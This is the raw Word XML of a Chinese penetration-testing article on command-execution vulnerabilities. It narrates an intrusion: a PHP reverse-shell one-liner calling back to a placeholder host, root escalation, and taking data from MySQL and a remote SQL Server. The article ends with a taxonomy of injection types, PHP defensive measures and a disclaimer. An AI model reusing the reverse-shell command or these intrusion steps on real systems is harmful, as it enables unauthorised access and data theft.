            <wp:docPr id="17" name="图片 17" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaS96LdbM5PTmxNjkJAsAUZiby2572hAdYPfLpMzykiblic9V8DicBSn6j2F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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaS96LdbM5PTmxNjkJAsAUZiby2572hAdYPfLpMzykiblic9V8DicBSn6j2Fw/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="275145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拿起脚本直接上</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大体流程就是检测是否存在漏洞-》存在漏洞则exploit-》建立socket连接-》执行php“php -r \'$sock=fsockopen("x.x.x.x",10089);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");\'”来反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="00765925">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="1574165"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="16" name="图片 16" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaS8zMOvM3CFMyDHSIccv4eoxlZTyS05ticf0UcWsX2ARNNzPXKMy0zow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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaS8zMOvM3CFMyDHSIccv4eoxlZTyS05ticf0UcWsX2ARNNzPXKMy0zoww/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="157416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成功反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="00765925">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="2950210"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="15" name="图片 15" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSO5vK4rsIgFhia5MrYyJlWvy6Ph2u5jtpLQHVl7n9vxUk71piazaN6U4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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSO5vK4rsIgFhia5MrYyJlWvy6Ph2u5jtpLQHVl7n9vxUk71piazaN6U4Q/640?wx_fmt=png&amp;wxfrom=5&amp;wx_laz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8540" cy="2950210"/>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通过ubuntu提权获得root权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="00765925">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="2632075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="图片 14" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSTgYO8qxlZlX7DS8fE7bBgkKec8wk9pdLA0TzNcbwXMeCPsuGGgcrO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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSTgYO8qxlZlX7DS8fE7bBgkKec8wk9pdLA0TzNcbwXMeCPsuGGgcrOQ/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="263207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进mysql看看</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="00765925">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="4906010"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="13" name="图片 13" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSlsOWibTWv5rA5oMhiax7W02OsVnzICQibINp0Vo4MiciayntqEYicqmcmom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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSlsOWibTWv5rA5oMhiax7W02OsVnzICQibINp0Vo4MiciayntqEYicqmcmomQ/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="4906010"/>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注意到此处存在一个远程的sqlserver数据库的连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="00765925">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="1621790"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="图片 12" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSy5UlQpFdMZNyjHGCr9ClUa6WicZZ1uWahM0RqtS1U8Szz4AIaaOkUe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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSy5UlQpFdMZNyjHGCr9ClUa6WicZZ1uWahM0RqtS1U8Szz4AIaaOkUeg/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="1621790"/>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使用navicat成功连上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="00765925">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="2886075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="11" name="图片 11" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSyichmlvhYTY524qnRdY1icypXJ2EhaesAStickibCA7lE3iawqAGxSrWe7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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSyichmlvhYTY524qnRdY1icypXJ2EhaesAStickibCA7lE3iawqAGxSrWe7Q/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="2886075"/>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拿到数据了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="00765925">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5279390" cy="826770"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="图片 10" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSZyyzOZZPKqcocuC2ib1I4n2XCzCqgb0GyXRGK85PTmRToJ26OF1icF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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSZyyzOZZPKqcocuC2ib1I4n2XCzCqgb0GyXRGK85PTmRToJ26OF1icFibg/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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9390" cy="826770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="2353310"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="9" name="图片 9" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSUP3tbD4iaTYFwZk5DN8z4wVWLIh9QR0vlUsfEMydO9dJ8rSZZdNc6U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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSUP3tbD4iaTYFwZk5DN8z4wVWLIh9QR0vlUsfEMydO9dJ8rSZZdNc6Ug/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="2353310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="006D418F">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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x03  资源推荐</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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>合天网安实验室的学习资源：</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PHP序列化漏洞实践：</w:t>
      </w:r>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5F9CEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://www.hetianlab.com/expc.do?ce=de5326db-7772-48d8-a880-258ac7a16ab2</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lastRenderedPageBreak/>
        <w:t>命令执行漏洞综合分析：</w:t>
      </w:r>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5F9CEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://www.hetianlab.com/cour.do?w=1&amp;c=C9d6c0ca797abec2016071516463300001</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ImageMagick命令执行漏洞：</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i/>
          <w:iCs/>
          <w:color w:val="5F9CEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://www.hetianlab.com/expc.do?ce=8700261e-dbcd-4a3a-aad4-1ad74de4a091</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Struts2(s2-045)远程命令执行：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="006D418F">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i/>
          <w:iCs/>
          <w:color w:val="5F9CEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://www.hetianlab.com/expc.do?ec=ECID9d6c0ca797abec2017031012041000001</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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x04  经验心得</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="006D418F">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="9756140" cy="55880"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="5" name="图片 5" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSelIgXexcRmlptaaMdicAEibtNj7UgOfTMH3Ixvcic0XU3gia8nzcpc4y1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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSelIgXexcRmlptaaMdicAEibtNj7UgOfTMH3Ixvcic0XU3gia8nzcpc4y1w/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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756140" cy="55880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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我们通常不会说是去特定挖一个命令执行的漏洞，因为很多情况下我们都是利用一个第三方组件存在的事件型漏洞进行渗透测试之后，才意识到原来这属于命令执行漏洞。</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因此，在挖掘漏洞漏洞前，我们很有必要弄清楚，我们挖的漏洞究竟属于哪一类。</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命令执行漏洞通常分为以下三种：</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  代码层过滤不严</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商业应用的一些核心代码封装在二进制文件中，在web应用中通过system函数来调用：</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system("/bin/program --arg $arg"); </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  系统的漏洞造成命令注入</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bash破壳漏洞(CVE-2014-6271) </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  调用的第三方组件存在代码执行漏洞：</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如WordPress中用来处理图片的ImageMagick组件</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JAVA中的命令执行漏洞(struts2/ElasticsearchGroovy等)</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ThinkPHP命令执行</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p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="006D418F">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第一类漏洞就像我们在0x01中给出的例子，是比较好找的，找到了就算是一个通用性漏洞，不过第二类和第三类都属于事件型漏洞，这类漏洞如果你是原创挖掘到的，那个就可以去想CNVD、CNNVD等申报，如果在挖掘前就没想着玩原创，网上其实有很多工具可以针对特定的事件型漏洞进行挖掘，像我展示的漏洞里就涉及了两款很热门的工具。不过不要沉迷于使用工具进行挖洞，脚本小子才是依赖工具的，我们在使用前必须明白原理，漏洞执行的流程，在以后争取开发出自己的工具，来自动化进行挖掘漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="006D418F">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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x05  防护措施</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1.尽量少用执行命令的函数或者直接禁用</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2.参数值尽量使用引号包括</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3.在使用动态函数之前，确保使用的函数是指定的函数之一</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4.在进入执行命令的函数/方法之前，对参数进行过滤，对敏感字符进行转义</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5.能使用脚本解决的工作，不要调用其他程序处理。尽量少用执行命令的函数，并在disable_functions中禁用</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6.对于可控点是程序参数的情况下，使用escapeshellcmd函数进行过滤，对于可控点是程序参数值的情况下，使用escapeshellarg函数进行过滤</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="00765925">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7.参数的值尽量使用引号包裹，并在拼接前调用addslashes进行转义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="00765925">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而针对由特定第三方组件引发的漏洞，我们要做的就是及时打补丁，修改安装时的默认配置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="006D418F">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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x06  声明</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00404516" w:rsidRPr="006D418F" w:rsidRDefault="00765925" w:rsidP="006D418F">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本系列文章旨在普及网络安全知识，提高小伙伴的安全意识的同时介绍常见漏洞的特征、挖掘技巧等。若读者因此做出危害网络安全的行为后果自负，与合天智汇及本人无关，特此声明。</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00404516" w:rsidRPr="006D4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925" w:rsidRDefault="00765925" w:rsidP="00765925">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00765925" w:rsidRDefault="00765925" w:rsidP="00765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925" w:rsidRDefault="00765925" w:rsidP="00765925">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00765925" w:rsidRDefault="00765925" w:rsidP="007659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37A"/>
    <w:rsid w:val="0039037A"/>
    <w:rsid w:val="006D418F"/>
    <w:rsid w:val="00765925"/>
    <w:rsid w:val="00A87DBB"/>
    <w:rsid w:val="00C2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A296F7B-13A4-4B24-B3C1-60F7DE2A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59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5925"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00765925"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="页脚 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00765925"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0076592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65925"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00765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8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dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>evil</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-01-08T06:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-08T06:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>